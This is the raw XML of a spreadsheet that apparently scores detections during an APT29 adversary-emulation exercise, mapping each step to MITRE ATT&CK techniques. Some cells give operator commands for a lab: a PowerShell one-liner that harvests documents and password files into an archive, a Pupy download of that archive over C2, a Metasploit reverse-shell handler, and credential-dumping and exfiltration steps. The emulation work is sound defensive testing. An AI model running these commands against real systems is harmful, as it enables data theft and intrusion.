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va36\Desktop\ON\Attacks_Scenario\APT29\Emulation Plan\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="8610" windowHeight="5025" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="Summary" sheetId="2" r:id="rId1"/>
    <sheet name="Day 1" sheetId="1" r:id="rId2"/>
    <sheet name="Day 2" sheetId="3" r:id="rId3"/>
    <sheet name="Detection Type" sheetId="6" r:id="rId4"/>
    <sheet name="Bug" sheetId="5" r:id="rId5"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'Day 1'!$A$2:$M$79</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'Day 2'!$A$2:$M$60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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1352" uniqueCount="738">
  <si>
    <t>Step</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>Tatic</t>
  </si>
  <si>
    <t>Technique</t>
  </si>
  <si>
    <t>T1204/T1204.002</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>User Execution: Malicious File</t>
  </si>
  <si>
    <t>T1036/1036.002</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>Masquerading: Right-to-Left Override</t>
  </si>
  <si>
    <t>T1059/T1059.003</t>
  </si>
  <si>
    <t>Command and Scripting interpreter: Window Command Shell</t>
  </si>
  <si>
    <t>T1086/T1059.001</t>
  </si>
  <si>
    <t>Command anh Scripting Interpreter: Powershell</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Automated Collection</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>Data from local system</t>
  </si>
  <si>
    <t xml:space="preserve">Exfiltration </t>
  </si>
  <si>
    <t>T1002/T1560.001</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
    <t>T1027/T1027.003</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Steganography</t>
  </si>
  <si>
    <t>T1122/T1546.015</t>
  </si>
  <si>
    <t>Privilege Escalation, Persistence, Defense Evasion</t>
  </si>
  <si>
    <t xml:space="preserve">Event Triggerd Execution: Component Object Model Hijacking </t>
  </si>
  <si>
    <t>T1088/T1548.002</t>
  </si>
  <si>
    <t>Bypass User Access Control</t>
  </si>
  <si>
    <t>Defense Evasion, Privilege Escalation</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>T1043</t>
  </si>
  <si>
    <t xml:space="preserve">Commonly Used Port </t>
  </si>
  <si>
    <t>T1071/T1071.001</t>
  </si>
  <si>
    <t>Application Layer Protocol: Web Protocols</t>
  </si>
  <si>
    <t>T1032/1573</t>
  </si>
  <si>
    <t>Encrypted Channel: Asymmetric Cryptography</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</t>
  </si>
  <si>
    <t>Process Discovery</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>T1107 / T1070.004</t>
  </si>
  <si>
    <t>Indicator Removal on Host: File Deletion</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>System Owner/User Discovery</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</t>
  </si>
  <si>
    <t>T1063/T1518.001</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>T1031 / T1543.003</t>
  </si>
  <si>
    <t>Persistence, Privilege Escalation</t>
  </si>
  <si>
    <t>Create or Modify System Process: Windows Service</t>
  </si>
  <si>
    <t>T1060 / T1547.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>Unsecured Credentials: Credentials In Files</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>T1081,T1552.001</t>
  </si>
  <si>
    <t>T1003 / T1555.003</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Credentials from Web Browsers</t>
  </si>
  <si>
    <t>T1036/T1036.005</t>
  </si>
  <si>
    <t xml:space="preserve">Defense Evasion </t>
  </si>
  <si>
    <t>Masquerading: Match Legitimate Name or Location</t>
  </si>
  <si>
    <t>T1145/T1552.004</t>
  </si>
  <si>
    <t>Unsecured Credentials: Private Keys</t>
  </si>
  <si>
    <t>T1003 / T1003.002</t>
  </si>
  <si>
    <t>OS Credential Dumping: Security Account Manager</t>
  </si>
  <si>
    <t>T1113</t>
  </si>
  <si>
    <t>Screen Capture</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>T1056/1056.001</t>
  </si>
  <si>
    <t>Criteria</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>T1573/T1573.001</t>
  </si>
  <si>
    <t>Encrypted Channel: Symmetric Cryptography</t>
  </si>
  <si>
    <t>The rcs.3aka3.doc process spawning from explorer.exe</t>
  </si>
  <si>
    <t>Evidence of the right-to-left override character (U+202E) in the rcs.3aka.doc process OR the original filename (cod.3aka.scr)</t>
  </si>
  <si>
    <t>Established network channel over port 1234</t>
  </si>
  <si>
    <t>Evidence that the network data sent over the C2 channel is encrypted</t>
  </si>
  <si>
    <t>Evidence that the network data sent over the C2 channel is encrypted (rc4)</t>
  </si>
  <si>
    <t>cmd.exe spawning from the rcs.3aka3.doc process</t>
  </si>
  <si>
    <t>powershell.exe spawning from cmd.exe</t>
  </si>
  <si>
    <t>powershell.exe executing (Get-)ChildItem</t>
  </si>
  <si>
    <t>Procedure</t>
  </si>
  <si>
    <t>Searched filesystem for document and media files using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing Compress-Archive</t>
  </si>
  <si>
    <t>T1560</t>
  </si>
  <si>
    <t>powershell.exe creating the file draft.zip</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Utility </t>
  </si>
  <si>
    <t>Compressed and stored files into ZIP (Draft.zip) using PowerShell</t>
  </si>
  <si>
    <t>Staged files for exfiltration into ZIP (Draft.zip) using PowerShell</t>
  </si>
  <si>
    <t>Scripted search of filesystem for document and media files using PowerShell</t>
  </si>
  <si>
    <t>The rcs.3aka3.doc process reading the file draft.zip while connected to the C2 channel</t>
  </si>
  <si>
    <t>The rcs.3aka3.doc process creating the file monkey.png</t>
  </si>
  <si>
    <t>Dropped stage 2 payload (monkey.png) to disk</t>
  </si>
  <si>
    <t>Evidence that a PowerShell payload was within monkey.png</t>
  </si>
  <si>
    <t>Embedded PowerShell payload in monkey.png using steganography</t>
  </si>
  <si>
    <t>Modified the Registry to enable COM hijacking of sdclt.exe using PowerShell</t>
  </si>
  <si>
    <t>Addition of the DelegateExecute subkey in HKCU\Software\Classes\Folder\shell\open\command</t>
  </si>
  <si>
    <t>Executed elevated PowerShell payload</t>
  </si>
  <si>
    <t>High integrity powershell.exe spawning from control.exe (spawned from sdclt.exe)</t>
  </si>
  <si>
    <t>Established network channel over port 443</t>
  </si>
  <si>
    <t>Evidence that the network data sent over the C2 channel is HTTPS</t>
  </si>
  <si>
    <t>Deletion of of the HKCU\Software\Classes\Folder\shell\Open\command subkey</t>
  </si>
  <si>
    <t>Modified the Registry to remove artifacts of COM hijacking</t>
  </si>
  <si>
    <t>Footnotes</t>
  </si>
  <si>
    <t>powershell.exe creating the file SysinternalsSuite.zip</t>
  </si>
  <si>
    <t>powershell.exe spawning from powershell.exe</t>
  </si>
  <si>
    <t>Spawned interactive powershell.exe</t>
  </si>
  <si>
    <t>powershell.exe executing Expand-Archive</t>
  </si>
  <si>
    <t>Decompressed ZIP (SysinternalsSuite.zip) file using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing Get-Process</t>
  </si>
  <si>
    <t>Enumerated current running processes using PowerShell</t>
  </si>
  <si>
    <t>sdelete64.exe deleting the file rcs.3aka3.doc</t>
  </si>
  <si>
    <t>Deleted rcs.3aka3.doc on disk using SDelete</t>
  </si>
  <si>
    <t>sdelete64.exe deleting the file draft.zip</t>
  </si>
  <si>
    <t>Deleted Draft.zip on disk using SDelete</t>
  </si>
  <si>
    <t>sdelete64.exe deleting the file SysinternalsSuite.zip</t>
  </si>
  <si>
    <t xml:space="preserve">File and Directory Discovery </t>
  </si>
  <si>
    <t>powershell.exe executing $env:TEMP</t>
  </si>
  <si>
    <t>Enumerated user's temporary directory path using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing $env:USERNAME</t>
  </si>
  <si>
    <t>Enumerated the current username using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing $env:COMPUTERNAME</t>
  </si>
  <si>
    <t>Enumerated the computer hostname using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing $env:USERDOMAIN</t>
  </si>
  <si>
    <t>Enumerated the current domain name using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing $PID</t>
  </si>
  <si>
    <t>Enumerated the current process ID using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing Get-WmiObject ... -Class AntiVirusProduct</t>
  </si>
  <si>
    <t>Enumerated anti-virus software using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing the NetUserGetGroups API</t>
  </si>
  <si>
    <t>Enumerated user's domain group membership via the NetUserGetGroups API</t>
  </si>
  <si>
    <t>powershell.exe executing Get-WmiObject ... -Class FireWallProduct</t>
  </si>
  <si>
    <t>Enumerated firewall software using PowerShell</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Domain Group</t>
  </si>
  <si>
    <t>T1069/T0169.002</t>
  </si>
  <si>
    <t>Software Discovery: Security Software Discovery</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>Native API</t>
  </si>
  <si>
    <t>The NetUserGetGroups API function loaded into powershell.exe from Netapi32.dll</t>
  </si>
  <si>
    <t>Executed API call by reflectively loading Netapi32.dll</t>
  </si>
  <si>
    <t>T1069/T0169.001</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Local Groups</t>
  </si>
  <si>
    <t>powershell.exe executing the NetUserGetLocalGroups API</t>
  </si>
  <si>
    <t>Enumerated user's local group membership via the NetUserGetLocalGroups API</t>
  </si>
  <si>
    <t>powershell.exe creating the Javamtsup service</t>
  </si>
  <si>
    <t>Created a new service (javamtsup) that executes a service binary (javamtsup.exe) at system startup</t>
  </si>
  <si>
    <t>powershell.exe creating the file hostui.lnk in the Startup folder</t>
  </si>
  <si>
    <t>Created a LNK file (hostui.lnk) in the Startup folder that executes on login</t>
  </si>
  <si>
    <t>accesschk.exe reading files within %APPDATALOCAL%\Google\chrome\user data\default\</t>
  </si>
  <si>
    <t>Read the Chrome SQL database file to extract encrypted credentials</t>
  </si>
  <si>
    <t>accesschk.exe executing the CryptUnprotectedData API</t>
  </si>
  <si>
    <t>Executed the CryptUnprotectedData API call to decrypt Chrome passwords</t>
  </si>
  <si>
    <t>Evidence that accesschk.exe is not the legitimate Sysinternals tool</t>
  </si>
  <si>
    <t>Masqueraded a Chrome password dump tool as accesscheck.exe, a legitimate Sysinternals tool</t>
  </si>
  <si>
    <t>powershell.exe creating a certificate file exported from the system</t>
  </si>
  <si>
    <t>Exported a local certificate to a PFX file using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe injecting into lsass.exe OR lsass.exe reading Registry keys under HKLM:\SAM\SAM\Domains\Account\Users\</t>
  </si>
  <si>
    <t>Dumped password hashes from the Windows Registry by injecting a malicious DLL into Lsass.exe</t>
  </si>
  <si>
    <t>powershell.exe executing the CopyFromScreen function from System.Drawing.dll</t>
  </si>
  <si>
    <t>Captured and saved screenshots using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing Get-Clipboard</t>
  </si>
  <si>
    <t>Captured clipboard contents using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing the GetAsyncKeyState API</t>
  </si>
  <si>
    <t>Input Capture: Keylogging</t>
  </si>
  <si>
    <t>Captured user keystrokes using the GetAsyncKeyState API</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t>Read data in the user's Downloads directory using PowerShell</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Utility</t>
  </si>
  <si>
    <t>powershell.exe creating the file OfficeSupplies.7z</t>
  </si>
  <si>
    <t>Compressed data from the user's Downloads directory into a ZIP file (OfficeSupplies.7z) using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing Compress-7Zip with the password argument used for encryption</t>
  </si>
  <si>
    <t>Encrypted data from the user's Downloads directory using PowerShell</t>
  </si>
  <si>
    <t>T1048/T1048.003</t>
  </si>
  <si>
    <t>Exfiltrated collection (OfficeSupplies.7z) to WebDAV network share using PowerShell</t>
  </si>
  <si>
    <t xml:space="preserve">Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol </t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>T1021/T1021.006</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>Enumerated remote systems using LDAP queries</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>Remote Services: Windows Remote Management</t>
  </si>
  <si>
    <t>T1027/T027.002</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Software Packing</t>
  </si>
  <si>
    <t>Evidence that the file python.exe is packed</t>
  </si>
  <si>
    <t>python.exe payload was packed with UPX</t>
  </si>
  <si>
    <t>T1078/T1078.002</t>
  </si>
  <si>
    <t>Valid Accounts: Domain Accounts</t>
  </si>
  <si>
    <t>T1021/T1021.002</t>
  </si>
  <si>
    <t>Remote Services: SMB/Windows Admin Shares</t>
  </si>
  <si>
    <t>python.exe creating the file rar.exe</t>
  </si>
  <si>
    <t>python.exe creating the file sdelete64.exe</t>
  </si>
  <si>
    <t>T1059/T1059.001</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: PowerShell </t>
  </si>
  <si>
    <t>powershell.exe spawning from python.exe</t>
  </si>
  <si>
    <t>T1074/T1074.001</t>
  </si>
  <si>
    <t>Data Staged: Local Data Staging</t>
  </si>
  <si>
    <t>powershell.exe creating the file working.zip</t>
  </si>
  <si>
    <t>powershell.exe executing rar.exe with the -a parameter for a password to use for encryption</t>
  </si>
  <si>
    <t>Staged files for exfiltration into ZIP (working.zip in AppData directory) using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing rar.exe</t>
  </si>
  <si>
    <t>Compressed staged ZIP (working.zip in AppData directory) into working.zip (on Desktop) using rar.exe</t>
  </si>
  <si>
    <t>T1560/T1560.001</t>
  </si>
  <si>
    <t>Exfiltration Over Command and Control Channel</t>
  </si>
  <si>
    <t>python.exe reading the file working.zip while connected to the C2 channel</t>
  </si>
  <si>
    <t>T1070/T1070.004</t>
  </si>
  <si>
    <t>Indicator Removal on Host: File Deletion</t>
  </si>
  <si>
    <t>sdelete64.exe deleting the file rar.exe</t>
  </si>
  <si>
    <t>Deleted rar.exe on disk using Sdelete</t>
  </si>
  <si>
    <t>sdelete64.exe deleting the file \Desktop\working.zip</t>
  </si>
  <si>
    <t>Deleted working.zip (from Desktop) on disk using Sdelete</t>
  </si>
  <si>
    <t>sdelete64.exe deleting the file \AppData\Roaming\working.zip</t>
  </si>
  <si>
    <t>Deleted working.zip (from AppData directory) on disk using Sdelete</t>
  </si>
  <si>
    <t>cmd.exe deleting the file sdelete64.exe</t>
  </si>
  <si>
    <t>Deleted SDelete on disk using cmd.exe del command</t>
  </si>
  <si>
    <t>T1569/T1569.002</t>
  </si>
  <si>
    <t>System Services: Service Execution</t>
  </si>
  <si>
    <t>javamtsup.exe spawning from services.exe</t>
  </si>
  <si>
    <t>Executed persistent service (javamtsup) on system startup</t>
  </si>
  <si>
    <t>T1547/T1547.001</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>Evidence that the file hostui.lnk (which executes hostui.bat as a byproduct) was executed from the Startup Folder</t>
  </si>
  <si>
    <t>Executed LNK payload (hostui.lnk) in Startup Folder on user login</t>
  </si>
  <si>
    <t>hostui.exe executing the CreateProcessWithToken API</t>
  </si>
  <si>
    <t>Executed PowerShell payload via the CreateProcessWithToken API</t>
  </si>
  <si>
    <t>T1134/T1134.002</t>
  </si>
  <si>
    <t>Access Token Manipulation: Create Process with Token</t>
  </si>
  <si>
    <t>hostui.exe manipulating the token of powershell.exe via the CreateProcessWithToken API OR powershell.exe executing with the stolen token of explorer.exe</t>
  </si>
  <si>
    <t>Manipulated the token of the PowerShell payload via the CreateProcessWithToken API</t>
  </si>
  <si>
    <t>Used unicode right-to-left override (RTLO) character to obfuscate file name rcs.3aka3.doc (originally cod.3aka.scr)</t>
  </si>
  <si>
    <t>Spawned interactive cmd.exe</t>
  </si>
  <si>
    <t>1.A.1</t>
  </si>
  <si>
    <t>1.A.2</t>
  </si>
  <si>
    <t>1.A.3</t>
  </si>
  <si>
    <t>1.A.4</t>
  </si>
  <si>
    <t>1.B.1</t>
  </si>
  <si>
    <t>1.B.2</t>
  </si>
  <si>
    <t>2.A.1</t>
  </si>
  <si>
    <t>2.A.2</t>
  </si>
  <si>
    <t>2.A.3</t>
  </si>
  <si>
    <t>2.A.4</t>
  </si>
  <si>
    <t>2.A.5</t>
  </si>
  <si>
    <t>2.B.1</t>
  </si>
  <si>
    <t>3.A.1</t>
  </si>
  <si>
    <t>3.A.2</t>
  </si>
  <si>
    <t>3.B.1</t>
  </si>
  <si>
    <t>3.B.2</t>
  </si>
  <si>
    <t>3.B.3</t>
  </si>
  <si>
    <t>3.B.4</t>
  </si>
  <si>
    <t>3.B.5</t>
  </si>
  <si>
    <t>3.C.1</t>
  </si>
  <si>
    <t>4.A.1</t>
  </si>
  <si>
    <t>4.A.2</t>
  </si>
  <si>
    <t>4.A.3</t>
  </si>
  <si>
    <t>4.B.1</t>
  </si>
  <si>
    <t>4.B.2</t>
  </si>
  <si>
    <t>4.B.3</t>
  </si>
  <si>
    <t>4.B.4</t>
  </si>
  <si>
    <t>4.C.1</t>
  </si>
  <si>
    <t>4.C.2</t>
  </si>
  <si>
    <t>4.C.3</t>
  </si>
  <si>
    <t>4.C.4</t>
  </si>
  <si>
    <t>4.C.5</t>
  </si>
  <si>
    <t>4.C.6</t>
  </si>
  <si>
    <t>4.C.7</t>
  </si>
  <si>
    <t>4.C.8</t>
  </si>
  <si>
    <t>4.C.9</t>
  </si>
  <si>
    <t>4.C.10</t>
  </si>
  <si>
    <t>4.C.11</t>
  </si>
  <si>
    <t>powershell.exe executing Gwmi Win32_OperatingSystem</t>
  </si>
  <si>
    <t>5.A.1</t>
  </si>
  <si>
    <t>5.B.1</t>
  </si>
  <si>
    <t>6.A.1</t>
  </si>
  <si>
    <t>6.A.2</t>
  </si>
  <si>
    <t>6.A.3</t>
  </si>
  <si>
    <t>6.B.1</t>
  </si>
  <si>
    <t>6.C.1</t>
  </si>
  <si>
    <t>7.A.1</t>
  </si>
  <si>
    <t>7.A.2</t>
  </si>
  <si>
    <t>7.A.3</t>
  </si>
  <si>
    <t>7.B.1</t>
  </si>
  <si>
    <t>7.B.2</t>
  </si>
  <si>
    <t>7.B.3</t>
  </si>
  <si>
    <t>7.B.4</t>
  </si>
  <si>
    <t>8.A.1</t>
  </si>
  <si>
    <t>8.A.2</t>
  </si>
  <si>
    <t>8.A.3</t>
  </si>
  <si>
    <t>8.B.1</t>
  </si>
  <si>
    <t>8.B.2</t>
  </si>
  <si>
    <t>8.C.1</t>
  </si>
  <si>
    <t>8.C.2</t>
  </si>
  <si>
    <t>9.A.1</t>
  </si>
  <si>
    <t>9.A.2</t>
  </si>
  <si>
    <t>9.B.1</t>
  </si>
  <si>
    <t>9.B.2</t>
  </si>
  <si>
    <t>9.B.3</t>
  </si>
  <si>
    <t>9.B.4</t>
  </si>
  <si>
    <t>9.B.5</t>
  </si>
  <si>
    <t>9.B.6</t>
  </si>
  <si>
    <t>9.B.7</t>
  </si>
  <si>
    <t>9.B.8</t>
  </si>
  <si>
    <t>9.C.1</t>
  </si>
  <si>
    <t>9.C.2</t>
  </si>
  <si>
    <t>9.C.3</t>
  </si>
  <si>
    <t>9.C.4</t>
  </si>
  <si>
    <t>10.A.1</t>
  </si>
  <si>
    <t>10.B.1</t>
  </si>
  <si>
    <t>10.B.2</t>
  </si>
  <si>
    <t>10.B.3</t>
  </si>
  <si>
    <t>10.A - System Services: Service Execution (T1035 / T1569.002)
Reboot Windows victim 1; wait for system to boot up
You should receive a callback with SYSTEM permissions from the javamtsup service</t>
  </si>
  <si>
    <t>10.B - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1060 / T1547.001)
Trigger the Startup Folder persistence by logging in to Windows victim 1</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Command and Scripting Interpreter: PowerShell (T1086 / T1059.001)
From Pupy C2 server:
[pupy] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>shell</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[pupy (CMD)] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>powershell</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2.A - Collection (T1119, T1005, T1002 / T1560.001)
Paste the following PowerShell 1-liner into the Pupy terminal:
[pupy (PowerShell)] &gt;
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>$env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[pupy (PowerShell)] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>exit</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[pupy (CMD)] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>exit</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4.C - Discovery (T1016, T1033, T1063 / T1518.001, T1069, T1082, T1083)
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Invoke-Discovery</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5.A - Create or Modify System Process: Windows Service (T1031 / T1543.003)
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Invoke-Persistence -PersistStep 1</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5.B - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1060 / T1547.001)
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Invoke-Persistence -PersistStep 2</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6.B - Unsecured Credentials: Private Keys (T1145 / T1552.004)
Steal PFX certificate:
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Get-PrivateKeys</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>exit</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6.C - OS Credential Dumping: Security Account Manager (T1003 / T1003.002)
Dump password hashes:
[meterpreter*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>run post/windows/gather/credentials/credential_collector</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7.B - Compression and Exfiltration (T1048, T1002, T1022 / T1560.001)
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Invoke-Exfil</t>
    </r>
  </si>
  <si>
    <t>User Execution: Malicious File (T1204 / T1204.002)
1. Login to victim workstation.
2. Double click 3aka3.doc on Desktop
This will send a reverse shell to the Pupy C2 server on port 1234</t>
  </si>
  <si>
    <t>Established C2 channel (10.10.0.166) via rcs.3aka3.doc payload over TCP port 1234</t>
  </si>
  <si>
    <t>Used RC4 stream cipher to encrypt C2 (10.10.0.16) traffic</t>
  </si>
  <si>
    <t>User 209WIN10 executed payload rcs.3aka3.doc</t>
  </si>
  <si>
    <t xml:space="preserve">Detection Type </t>
  </si>
  <si>
    <t>None</t>
  </si>
  <si>
    <t>Detection Note</t>
  </si>
  <si>
    <t xml:space="preserve">Telemetry </t>
  </si>
  <si>
    <t>Telemetry</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2.B - Exfiltration Over C2 Channel (T1041)
[pupy] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>download "C:\Users\local.admin\AppData\Roaming\Draft.Zip" .</t>
    </r>
  </si>
  <si>
    <t>Read and downloaded ZIP (Draft.zip) over C2 channel (10.10.0.166 over TCP port 1234)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3.A - Ingress Tool Transfer (T1105)
Start Metasploit handler:
[msf] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>handler -H 0.0.0.0 -P 443 -p windows/x64/meterpreter/reverse_https</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
From Pupy, upload monkey.png to target:
[pupy] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">upload "/var/www/webdav/APT29/haha.png" "C:\Users\local.admin\Downloads\haha.png" </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[pupy] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">shell 
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
